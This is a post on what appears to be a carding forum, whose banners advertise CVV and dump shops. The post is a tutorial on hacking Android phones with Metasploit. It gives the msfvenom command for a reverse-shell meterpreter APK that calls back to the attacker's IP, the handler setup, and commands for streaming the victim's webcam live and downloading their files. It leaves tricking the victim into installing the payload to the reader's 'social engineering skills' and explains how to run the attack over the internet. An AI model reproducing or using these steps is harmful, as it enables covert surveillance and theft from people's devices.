Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!
adv ex on 5 january 2024
adv ex on 22 February 2024
adv ex on 22 February 2024
banner Expire 26 April 2024
Rescator cvv and dump shop
banner expire at 13 May

Yale lodge shop
UniCvv
banner Expire 1 April  2021

How to Hack Android Devices Using Metasploit

ALBERT

TRUSTED VENDOR
Staff member
Joined
Dec 3, 2020
Messages
1,214
If you would rather watch a video tutorial, check this out:





In this tutorial, I'll be teaching you how to hack Android devices such as phones and tablets using Metasploit.
I'm going to be using Sana (Kali 2.0) for this tutorial, but you're welcome to use any distro you want as long as it can run Metasploit.
This is very easy to do - simply follow the below steps and you should be good to go.
Part 1: Generating The Payload
To generate the payload, open up a terminal and type in the following commands:
Code
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.225 LPORT=444 R > randomfile.apk
[Image: 8502b5a960.png]
Here, android/meterpreter/reverse_tcp is the name of the payload we're going to be using.
LHOST is the IP address to which the client is going to connect (your IP address).
To find it, open up a new terminal and type in ifconfig.
Your IP address will be where I've highlighted the text:
[Image: 604077e0a4.png]
LPORT can be essentially any valid port number on your machine, you just need to make sure that it's not currently in use.
Replace RandomFile.apk with your file name.
...Hit ENTER and your payload should be generated successfully.
The apk file that was generated is the one you want the target device to run. This may require some social engineering skills, I'll just leave that to you.
Part 2: The Exploit
Once the payload has been successfully transfered to the target device, we need to start listening on the specified address and port to exploit the device.
For this, let's open up the Metasploit console.
Enter the following commands:
Code
service postgresql start
msfconsole
That's going to open up the Metasploit console.
Now we want to use a payload handler for handling our reverse TCP connection.
For this, type the following in the Metasploit terminal:
Code
use multi/handler
[Image: 7ed7b4aa48.png]
You should now have a prompt which says exploit(handler). Awesome, now let's set the options.
To do that, enter the following commands:
Code
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST Your_IP
set LPORT Port_Number
Replace the required info with yours in the above commands.
Now type the following command and verify all the options:
Code
show options
This is what my configuration looks like:
[Image: 5c3773b325.png]
If you're certain all the options are valid, enter the following command to start the handler (listening):
Code
exploit
[Image: 1bfc159615.png]
As soon as the device executes the payload (opens the app), your Meterpreter terminal should say "Meterpreter session one opened" or something of that sort.
This means you have successfully gained access to the device.
To view the list of available commands, just put a question mark (?) and hit ENTER.
[Image: 2593949725.png]
To use a command, simply type the name of the command and hit ENTER. If it requires any parameters, it will mention that.
Some useful commands:
To stream video from the device's camera live, use the following command:
Code
webcam_stream
To download/upload files from/to the device:
Code
download/upload %FILEPATH%
Over The Internet
In the above case, everything was attempted on a local network.
In case you wish to do this over the internet, follow the same steps. Instead of using ifconfig, use the following command:
Code
dig TXT +short o-o.myaddr.l.google.com @ns1.google.com
You would also need to enable port forwarding on your router for it to work over the internet.
That's pretty much it. If you have any questions or if I've made any mistakes, just let me know.
 
Top Bottom